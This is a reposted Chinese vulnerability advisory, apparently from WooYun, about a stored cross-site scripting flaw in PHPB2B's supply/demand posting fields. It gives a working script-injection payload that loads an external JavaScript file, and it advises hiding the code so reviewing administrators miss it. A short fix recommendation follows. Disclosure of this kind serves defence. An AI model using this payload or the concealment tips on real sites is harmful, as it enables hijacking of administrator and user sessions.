记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

PHPB2B存储型跨站(可打管理员和任意用户)

2014-06-21 13:00

1、phpB2B对用户发布供求信息模块,没有进行有效过滤,存在漏洞的字段包括主题、包装说明、价格说明等等。攻击者可以插入恶意代码,后台管理员审核用户供求信息时,漏洞触发,审核过程中,管理员并不会发现任何恶意代码,审核一旦成功,其它任何用户浏览供求信息时,便会触发漏洞。

通杀所有浏览器。

漏洞证明:

1、以发布供求信息主题字段为例进行说明。

2、用户进入商务室进行发布供求信息

3、在主题字段嵌入如下恶意代码:

<script src=http://127.0.0.1/eXploit.js></script>

phpb2b1.png



4、管理员审核用户供求信息,进入审核页面时,漏洞便可触发:

phpb2b2.png



5、查看页面源代码,成功嵌入恶意脚本

phpb2b3.png



6、审核通过,其它用户浏览供求信息,漏洞触发

phpb2b4.png



7、查看页面源代码,成功嵌入恶意脚本

phpb2b5.png



利用主题字段,我们可以更好的攻击系统管理员,为了更好的隐藏恶意代码,我们可以适当增加主题字段长度,当然我们可以利用其它字段进行攻击,其它字段对恶意代码的隐藏性更好,管理员应该完全注意不到恶意代码的存在,例如包装说明等字段,这样审核通过后,我们便可攻击其它任意用户,此处便不再详细说明

修复方案:

对发布供求信息的各字段进行有效过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-065109

阅读:56270 | 评论:0 | 标签:跨站

想收藏或者和大家分享这篇好文章→复制链接地址

“PHPB2B存储型跨站(可打管理员和任意用户)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词